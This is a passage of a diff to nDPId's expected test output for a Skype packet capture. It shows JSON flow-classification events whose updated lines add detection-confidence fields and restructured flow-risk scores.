-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642969,"flow_last_seen":1431969723490,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1440,209 +1439,209 @@
 00630{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1431969716015,"flow_last_seen":1431969752089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2961,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00630{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1431969715511,"flow_last_seen":1431969808618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":5646,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969642376,"flow_last_seen":1431969712120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":2483,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643971,"flow_last_seen":1431969670410,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00596{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
